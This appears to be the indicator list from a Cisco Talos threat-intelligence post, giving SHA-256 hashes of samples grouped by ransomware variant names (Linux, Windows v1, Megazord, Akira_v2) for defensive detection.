87b4020bcd3fad1f5711e6801ca269ef5852256eeaf350f4dde2dc46c576262d 

988776358d0e45a4907dc1f4906a916f1b3595a31fa44d8e04e563a32557eb42 

  

Linux (The Return) 

3805f299d33ef43d17a5a1040149f0e5e2d5db57ec6f03c5687ac23db1f77a30 

abba655df92e99a15ddcde1d196ff4393a13dbff293e45f5375a2f61c84a2c7b 

a546ef13e8a71a8b5f0803075382eb0311d0d8dbae3f08bac0b2f4250af8add0 

6005dcbe15d60293c556f05e98ed9a46d398a82e5ca4d00c91ebec68a209ea84 

43c5a487329f5d6b4a6d02e2f8ef62744b850312c5cb87c0a414f3830767be72 

8e9a33809b9062c5033928f82e8adacbef6cd7b40e73da9fcf13ec2493b4544c 

bcae978c17bcddc0bf6419ae978e3471197801c36f73cff2fc88cecbe3d88d1a 

3805f299d33ef43d17a5a1040149f0e5e2d5db57ec6f03c5687ac23db1f77a30 

  

Windows v1 

678ec8734367c7547794a604cc65e74a0f42320d85a6dce20c214e3b4536bb33 

6cadab96185dbe6f3a7b95cf2f97d6ac395785607baa6ed7bf363deeb59cc360 

3c92bfc71004340ebc00146ced294bc94f49f6a5e212016ac05e7d10fcb3312c 

1b6af2fbbc636180dd7bae825486ccc45e42aefbb304d5f83fafca4d637c13cc 

5c62626731856fb5e669473b39ac3deb0052b32981863f8cf697ae01c80512e5 

  

Megazord 

dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198 

28cea00267fa30fb63e80a3c3b193bd9cd2a3d46dd9ae6cede5f932ac15c7e2e 

a6b0847cf31ccc3f76538333498f8fef79d444a9d4ecfca0592861cf731ae6cb 

b55fbe9358dd4b5825ce459e84cd0823ecdf7b64550fe1af968306047b7de5c9 

c9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0 

0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d 

95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a 

e3fa93dad8fb8c3a6d9b35d02ce97c22035b409e0efc9f04372f4c1d6280a481 

68d5944d0419bd123add4e628c985f9cbe5362ee19597773baea565bff1a6f1a 

8816caf03438cd45d7559961bf36a26f26464bab7a6339ce655b7fbad68bb439 

c0c0b2306d31e8962973a22e50b18dfde852c6ddf99baf849e3384ed9f07a0d6 

7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be 

2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83 

9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c 

9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065 

131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07 

 

Akira_v2: 

3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75 

0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c 

Cisco Talos Blog – ​Read More